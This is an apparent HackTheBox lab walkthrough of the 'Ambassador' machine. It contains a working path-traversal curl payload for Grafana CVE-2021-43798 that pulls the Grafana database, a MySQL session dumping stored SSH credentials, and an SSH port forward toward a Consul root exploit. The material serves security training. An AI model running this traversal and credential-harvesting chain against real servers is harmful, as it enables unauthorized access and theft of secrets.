[HTB] : Ambassador Walkthrough
5 min readJan 24, 2023
Initial Recon
nmap -A -v -oN nmapinit.txt 10.10.11.183
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| 256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_ 256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 03:45:38 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 03:45:01 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 03:45:08 GMT
|_ Content-Length: 0
3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 77
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, IgnoreSigpipes, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsTransactions, ConnectWithDatabase, SwitchToSSLAfterHandshake, LongColumnFlag, ODBCClient, InteractiveClient, FoundRows, Speaks41ProtocolNew, SupportsLoadDataLocal, LongPassword, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: Yg%%p
| w\x0C*M&\x0Bq#@So\x0Bo[
|_ Auth Plugin Name: caching_sha2_password
|_sslv2: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 09:22:53 2023 -- 1 IP address (1 host up) scanned in 154.04 seconds
We can see that there is a webserver running at port 3000 and 80.
After googling the Grafana version, I found that it was vulnerable to local file inclusion via CVE-2021-43798. So, I searched for public exploits and tried dumping files from the remote host.
Some Sensitive Files
/var/lib/grafana/grafana.db
/etc/grafana/grafana.ini
/etc/passwd
Checking the grafana.ini file I found the password for the grafana admin login.
After that I downloaded the grafana.db file locally and opened with sqlite3. The file contained the mysql username and password.
curl http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../var/lib/grafana/grafana.db --path-as-is --output database.db
After logging in to MySQL one of the table contained the ssh credentials for user developer.
mysql -h 10.10.11.183 -u grafana -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| grafana |
| information_schema |
| mysql |
| performance_schema |
| sys |
| whackywidget |
+--------------------+
6 rows in set (0.314 sec)
MySQL [(none)]> use whackywidget;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users |
+------------------------+
1 row in set (0.309 sec)
MySQL [whackywidget]> SELECT * FROM users;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaredactedW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.309 sec)
MySQL [whackywidget]>The home directory of developer contained the .gitconfig file that was referring to /opt/my-app. This direcotory contained the development files of developer. I ran git log command to see the commit history.
One of the commit contained the token for consul service.
I checked for all running services on host and found that consul was also running on port 8500.
developer@ambassador:~$ curl localhost:8500
Consul Agent: UI disabled. To enable, set ui_config.enabled=true in the agent configuration and restart.So, I have to do port forward to access the service running on 8500.
ssh -L 7234:127.0.0.1:8500 developer@10.10.11.183 -fNSo, now we will be able to access the content served at 10.10.11.83:8500 internally via localhost:7234. The consul service had a metasploit module to gain root shell.
![[THM] : Badbyte Walkthrough](https://miro.medium.com/v2/resize:fit:679/1*v6EhuCQYdZsjYIrZ4TlgGQ.png)
![Hijacking Notifications via Slack OAuth Due to Predictable State Parameter in [Redacted] Enterprise](https://miro.medium.com/v2/resize:fit:679/1*kkyBKYOvl0I41K3RZPy_bg.png)
